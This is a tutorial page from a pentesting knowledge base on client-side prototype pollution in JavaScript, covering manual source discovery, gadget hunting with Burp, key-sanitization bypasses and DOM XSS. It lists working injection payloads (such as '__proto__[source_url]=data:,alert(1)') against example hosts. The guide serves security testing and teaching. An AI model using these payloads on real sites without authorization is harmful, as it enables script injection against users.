Sec-88
  • 🧑Whoami
  • 🕸️Web-AppSec
    • Features Abuse
      • 2FA
      • Ban Feature
      • CAPTCHA
      • Commenting
      • Contact us
      • File-Upload
      • Inviting Feature
      • Messaging Features
      • Money-Related Features
      • Newsletter
      • Profile - Settings
      • Registration
      • Reset Password
      • Review
      • Rich Editor/Text
      • Social Sharing
      • Billing-Shipping Address Management
      • Integrations - Webhooks
      • API Key Management
    • Reconnaissance
      • Attacking Organizations with big scopes
    • Subdomain Enumeration
    • Fingerprinting
    • Dorking
    • XSS-HTML Injection
    • Improper Authentication
      • JWT Security
    • OAUTH Misconfigurations
      • OAuth 2.0 Basics
      • OAUTH Misconfigurations
    • Auth0 Misconfigurations
    • Broken Access Control
      • Insecure Direct Object References (IDOR)
      • 403 Bypass
    • Broken Link Injection
    • Command Injection
    • CORS
    • CRLF
    • CSRF
    • Host Header Attacks
    • HTTP request smuggling
    • JSON Request Testing
    • LFI
      • LFI to RCE
    • No Rate Limit
    • Parameters Manual Testing
    • Open Redirect
    • Registration & Takeover Bugs
    • Remote Code Execution (RCE)
    • Session Fixation
    • SQL Injection
      • SQL To RCE
    • SSRF
    • SSTI
    • Subdomain Takeover
    • Web Caching Vulnerabilities
    • WebSockets
    • XXE
      • XXE to RCE
    • Cookie Based Attacks
    • CMS
      • AEM [Adobe CMS]
    • XSSI (Cross Site Script Inclusion)
    • NoSQL injection
    • Local VS Remote Session Fixation
    • Protection
      • Security Mechanisms for Websites
      • Cookie Flags
      • SameSite Cookie Restrictions
      • Same-origin policy (SOP)
      • CSP
    • Hacking IIS Applications
    • Dependency Confusion
    • Attacking Secondary Context
    • Hacking Web Sockets
    • IDN Homograph Attack
    • DNS Rebinding Attack
    • LLM Hacking Checklist
    • Bypass URL Filtration
    • Cross-Site Path Traversal (CSPT)
    • PostMessage Security
    • Prototype Pollution
      • Client-Side Prototype Pollution
      • Server-Side prototype pollution
    • Tools-Extensions-Bookmarks
    • WAF Bypassing Techniques
    • SSL/TLS Certificate Lifecycle
    • Serialization in .NET
    • Client-Side Attacks
      • JavaScript Analysis
    • Bug Bounty Platforms/Programs
  • ✉️API-Sec
    • GraphQL API Security Testing
      • The Basics
      • GraphQL Communication
      • Setting Up a Vulnerable GraphQL Server
      • GraphQL Hacking Tools
      • GraphQL Attack Surface
      • RECONNAISSANCE
      • GraphQL DOS
      • Information Disclosure
      • AUTHENTICATION AND AUTHORIZATION BYPASSES
      • Injection Vulnerabilities in GraphQL
      • REQUEST FORGERY AND HIJACKING
      • VULNERABILITIES, REPORTS AND EXPLOITS
      • GraphQL Hacking Checklist
    • API Recon
    • API Token Attacks
    • Broken Object Level Authorization (BOLA)
    • Broken Authentication
    • Evasive Maneuvers
    • Improper Assets Management
    • Mass Assignment Attacks
    • SSRF
    • Injection Vulnerabilities
    • Excessive Data Exposure
    • OWASP API TOP 10 MindMap
    • Scanning APIs with OWASP ZAP
  • 📱Android-AppSec
    • Setup Android App Pentesting environment on Arch
    • Setup Android App Pentesting environment on Mac M4
    • Setup Android Pentesting Environment on Debian Linux
    • Android App Fundamentals
      • Android Architecture
      • Android Security Model
      • Android App Components
        • Intents
        • Pending Intents
    • Android App Components Security Cheatsheet
    • Android App Pentesting Checklist
    • How To Get APK file for application
    • ADB Commands
    • APK structure
    • Android Permissions
    • Exported Activity Hacking
    • BroadcastReceiver Hacking
    • Content Provider Hacking
    • Signing the APK
    • Reverse Engineering APK
    • Deep Links Hacking
    • Drozer Cheat Sheet
    • SMALI
      • SMALI Cheat Sheet
      • Smali Code Patching Guide
    • Intent Redirection Vulnerability
    • Janus Vulnerability (CVE-2017-13156)
    • Task Hijacking
    • Hacking Labs
      • Injured Android
      • Hacking the VulnWebView Lab
      • Hacking InsecureBankv2 App
    • Frida Cheat Sheet
  • 📶Network-Sec
    • Networking Fundamentals
    • Open Ports Security Testing
    • Vulnerability Scanning
    • Client Side Attacks
    • Port Redirection and Tunneling
    • Password Attacks
    • Privilege Escalation [PrevEsc]
      • Linux Privilege Escalation
    • Buffer Overflow (BOF)
      • VulnServer
      • Sync Breez Enterprize
      • Crashed CTF
      • BOF for Linux
    • AV Evasion
    • Post Exploitation
      • File Transfer
      • Maintaining Access
      • Pivoting
      • Clean Up
    • Active Directory
      • Basic AD Pentesting
  • 💻Desktop AppSec
    • Thin Client vs. Thick Client
  • ☁️Cloud Sec
    • Salesforce Hacking
      • Basics
      • Salesforce SAAS Apps Hacking
    • Firebase
    • S3 Buckets Misconfigurations
  • 👨‍💻Programming
    • HTML
    • JavaScript (JS)
      • window.location object
    • Python
      • Python Tips
      • Set
        • SetMethods
    • JAVA
      • Java Essentials
      • Java Essentials Code Notes
      • Java OOP1
      • JAVA OOP Principles
        • Inheritance
        • Method Overriding
        • Abstract Class
        • Interface
        • polymorphism
        • Encapsulation
        • Composition
      • Java OOP Challenges
      • Exception Handling
    • Go
      • Go Syntax Tutorial in one file
      • Methods and Interfaces
      • Go Slices
      • Go Maps
      • Go Functions
      • Concurrency
      • Read Files
      • Write Files
      • Package
        • How to make personal Package
        • regexp Packages
        • Json
        • bufio
        • Time
      • Signals-Exit
      • Unit Testing
  • 🖥️Operating Systems
    • Linux
      • Linux Commands
      • Tools
      • Linux File System
      • Bash Scripting guide
      • tmux
      • Git
      • Install Go tools from private repositories using GitHub PAT
    • VPS
    • Burp Suite
  • ✍️Write-Ups
    • Hunting Methodology
    • API BAC leads to PII Data Disclosure
    • Misconfigured OATUH leads to Pre-Account Takeover
    • Automating Bug Bounty with GitHub Actions
    • From Recon to Reward: My Bug Bounty Methodology when Hunting on Public Bug Bounty Programs
    • Exploring Subdomains: From Enumeration to Takeover Victory
    • 0-Click Account Takeover via Insecure Password Reset Feature
    • How a Simple Click Can Lead to Account Takeover: An OAuth Insecure Implementation Vulnerability
    • The Power Of IDOR even if it is unpredictable IDs
    • Unlocking the Weak Spot: Exploiting Insecure Password Reset Tokens
    • AI Under Siege: Discovering and Exploiting Vulnerabilities
    • Inside the Classroom: How We Hacked Our Way Past Authorization on a Leading EdTech Platform
    • How We Secured Our Client’s Platform Against Interaction-Free Account Thefts
    • Unchecked Privileges: The Hidden Risk of Role Escalation in Collaborative Platforms
    • Decoding Server Behavior: The Key to Mass Account Takeover
    • Exploiting JSON-Based CSRF: The Hidden Threat in Profile Management
    • How We Turned a Medium XSS into a High Bounty by Bypassing HttpOnly Cookie
Powered by GitBook
On this page
  • Introduction
  • Finding Client-Side Prototype Pollution Sources Manually
  • Identifying Gadgets for Exploitation
  • Exploitation
  • Bypasses
  • Exploit to DOM XSS
  • Bypass HTML sanitizers
  • Tools for Detecting Prototype Pollution
  • Resources

Was this helpful?

Edit on GitHub
  1. Web-AppSec
  2. Prototype Pollution

Client-Side Prototype Pollution

Introduction

Client-side prototype pollution is a powerful vulnerability that allows attackers to manipulate JavaScript's global objects by injecting properties into prototypes. This guide will walk you through the process of identifying and exploiting these vulnerabilities, both manually and using automated tools like DOM Invader. You’ll also get hands-on practice exploiting prototype pollution for DOM-based Cross-Site Scripting (XSS) on intentionally vulnerable labs.

Finding Client-Side Prototype Pollution Sources Manually

High-Level Steps:

  1. Inject Arbitrary Properties: Attempt to inject properties into the Object.prototype using the query string, URL fragment, or JSON input. For example:

    vulnerable-website.com/?__proto__[foo]=bar

  2. Inspect the Prototype: Use the browser console to check if the property was successfully added:

    Object.prototype.foo

  3. Try Different Techniques: If unsuccessful, alternate between dot notation and bracket notation:

    vulnerable-website.com/?__proto__.foo=bar

  4. Explore Alternative Vectors: If direct injection fails, attempt to exploit the prototype via its constructor.

Identifying Gadgets for Exploitation

Once you’ve identified a source, the next step is to find gadgets—pieces of code that can be exploited using the polluted properties.

Manual Gadget Hunting:

  1. Look through the source code and identify any properties that are used by the application or any libraries that it imports.

  2. In Burp, enable response interception (Proxy > Options > Intercept server responses) and intercept the response containing the JavaScript that you want to test.

  3. Add a debugger statement at the start of the script, then forward any remaining requests and responses.

  4. In Burp's browser, go to the page on which the target script is loaded. The debugger statement pauses execution of the script.

  5. While the script is still paused, switch to the console and enter the following command, replacing YOUR-PROPERTY with one of the properties that you think is a potential gadget:

Object.defineProperty(Object.prototype, 'YOUR-PROPERTY', {
    get() {
        console.trace();
        return 'polluted';
    }
})

The property is added to the global Object.prototype, and the browser will log a stack trace to the console whenever it is accessed.

  1. Press the button to continue execution of the script and monitor the console. If a stack trace appears, this confirms that the property was accessed somewhere within the application.

  2. Expand the stack trace and use the provided link to jump to the line of code where the property is being read.

  3. Using the browser's debugger controls, step through each phase of execution to see if the property is passed to a sink, such as innerHTML or eval().

  4. Repeat this process for any properties that you think are potential gadgets.

Exploitation

Bypasses

Prototype Pollution via the Constructor

Apart from the classic __proto__ vector, attackers can also exploit the constructor property of JavaScript objects. By manipulating the constructor, you can gain access to the object’s prototype and pollute it without relying on the __proto__ string.

Bypassing Flawed Key Sanitization

A common defense against prototype pollution is sanitizing property keys before merging them into objects. However, flawed sanitization processes that fail to recursively strip dangerous keys can be bypassed using creative input crafting.

https://example.com/?__proto__[foo]=bar
https://example.com/?__proto__.foo=bar
https://example.com/?constructor.[prototype][foo]=bar
https://example.com/?constructor.prototype.foo=bar
Object.constructor.prototype.evilProperty="evilPayload"
Object.constructor["prototype"]["evilProperty"]="evilPayload"
x[__proto__][abaeead] = abaeead
x.__proto__.edcbcab = edcbcab
__proto__[eedffcb] = eedffcb
__proto__.baaebfc = baaebfc
?__proto__[test]=test

# Bypass sanitization
https://example.com/?__pro__proto__to__[foo]=bar
https://example.com/?__pro__proto__to__.foo=bar
https://example.com/?constconstructorructor[prototype][foo]=bar
https://example.com/?constconstructorructor.prototype.foo=bar
https://example.com/?constconstructorructor[protoprototypetype][foo]=bar
https://example.com/?constconstructorructor.protoprototypetype.foo=bar

Exploit to DOM XSS

If our payload affects an HTML element after loading, we can inject DOM-based XSS as below. Assume the key name of the property is "source_url", whose value is loaded as "src" in a script element. What property name is defined might be found by investigating JavaScript code assigned in the website.

https://example.com/?__proto__[source_url]=data:,alert(1);
https://example.com/?__proto__[source_url]=data:,alert(1);
https://example.com/?__proto__[source_url]=alert(1)-

Bypass HTML sanitizers

Research has shown that certain HTML sanitizers like sanitize-html and DOMPurify can be bypassed using prototype pollution gadgets. Understanding how to exploit these sanitizers can elevate your attack strategy.

  • sanitize-html

  • XSS

  • dompurify

Tools for Detecting Prototype Pollution

Resources

PreviousPrototype PollutionNextServer-Side prototype pollution

Last updated 8 months ago

Was this helpful?

Reflected XSS:

Client-side bypass:

: A tool for fuzzing and finding prototype pollution vulnerabilities.

: A map of known prototype pollution vulnerabilities in JavaScript libraries.

: A tool for finding prototype pollution sources.

: A browser extension for automatically scanning web pages for prototype pollution vulnerabilities.

: Burp Browser Extension Automating Hunting for pp

[Arabic]

[Arabic]

🕸️
Reflected XSS on www.hackerone.com via Wistia embed code - #986386
Prototype pollution – and bypassing client-side HTML sanitizers
ppfuzz
ppmap
proto-find
PPScan
Dom-Invador
PortSwigger Web Security
Intigriti Revenge Challenge Writeup
GitHub - Client-Side Prototype Pollution
Khaled-Sakr Video
https://www.youtube.com/watch?v=elRZDl8i0RY
pp-research
https://blog.huli.tw/2022/05/02/en/intigriti-revenge-challenge-author-writeup/
https://book.hacktricks.xyz/pentesting-web/deserialization/nodejs-proto-prototype-pollution/client-side-prototype-pollution#finding-script-gadgets
https://portswigger.net/web-security/cross-site-scripting/cheat-sheet#prototype-pollution
https://github.com/BlackFan/client-side-prototype-pollution
https://research.securitum.com/prototype-pollution-and-bypassing-client-side-html-sanitizers/
https://github.com/HacKeD0x90/Prototype_Pollution
https://github.com/BlackFan/client-side-prototype-pollution?tab=readme-ov-file
Prototype pollution - and bypassing client-side HTML sanitizers - research.securitum.comresearch.securitum.com
Logo